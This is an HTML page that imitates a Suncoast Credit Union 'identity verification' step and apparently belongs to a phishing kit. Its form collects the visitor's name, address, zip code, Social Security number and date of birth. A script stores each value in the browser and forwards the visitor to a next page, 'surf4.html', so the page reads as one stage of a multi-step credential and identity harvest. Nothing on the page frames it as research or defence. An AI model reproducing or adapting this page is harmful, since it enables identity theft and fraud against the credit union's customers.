<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Suncoast Credit Union - Identity Verification</title>
  <link rel="shortcut icon" href="images/favicon.ico"/>
  <style>
    body {
      margin: 0;
      font-family: Segoe UI, Arial, sans-serif;
      background-color: #EEE;
    }

    .background-img {
      width: 100%;
      height: auto;
      display: block;
    }

    .form-container {
      max-width: 460px;
      margin: 80px auto 50px auto;
      background-color: white;
      padding: 30px;
      border-radius: 8px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      position: relative;
      z-index: 1;
    }

    h2 {
      text-align: center;
      color: #333;
      margin-bottom: 25px;
    }

    label {
      display: block;
      margin: 15px 0 5px;
      font-weight: bold;
      color: #333;
    }

    input[type="text"],
    input[type="date"],
    input[type="password"],
    input[type="number"] {
      width: 100%;
      padding: 10px;
      margin-bottom: 15px;
      font-size: 14px;
      border: 1px solid #ccc;
      border-radius: 4px;
    }

    input:focus {
      border-color: #0e8400;
      outline: none;
    }

    .button {
      background-color: #f8971d;
      border: none;
      color: white;
      padding: 12px 20px;
      font-size: 16px;
      border-radius: 4px;
      cursor: pointer;
      width: 100%;
      margin-top: 10px;
    }

    .button:hover {
      background-color: #e18510;
    }

    @media screen and (max-width: 768px) {
      .form-container {
        margin: 20px auto;
        padding: 20px;
      }
    }
  </style>
</head>
<body>
  <img class="background-img" src="images/s1.png" alt="Step Background">

  <div class="form-container">
    <h2>Verify Your Personal Details</h2>
       <form id="detailsForm" autocomplete="off">
      <label for="fname">First Name:</label>
      <input type="text" name="fname" id="fname" required>

      <label for="lname">Last Name:</label>
      <input type="text" name="lname" id="lname" required>

      <label for="address">Address:</label>
      <input type="text" name="address" id="address" required>

      <label for="zip">Zip Code:</label>
      <input type="text" name="zip" id="zip" required>

      <label for="ssn">SSN:</label>
      <input type="text" name="ssn" id="ssn" maxlength="11" placeholder="XXX-XX-XXXX" required>

      <label for="dob">Date of Birth:</label>
      <input type="date" name="dob" id="dob" required>

      <button type="submit" class="button">Next</button>
    </form>
  </div>
    </div>

  <script>
  const form = document.getElementById('detailsForm');
  form.addEventListener('submit', function (e) {
    e.preventDefault();
    localStorage.setItem('fname', form.fname.value);
    localStorage.setItem('lname', form.lname.value);
    localStorage.setItem('address', form.address.value);
    localStorage.setItem('zip', form.zip.value);
    localStorage.setItem('ssn', form.ssn.value);
    localStorage.setItem('dob', form.dob.value);
    window.location.href = 'surf4.html';
  });
</script>
</body>
</html>
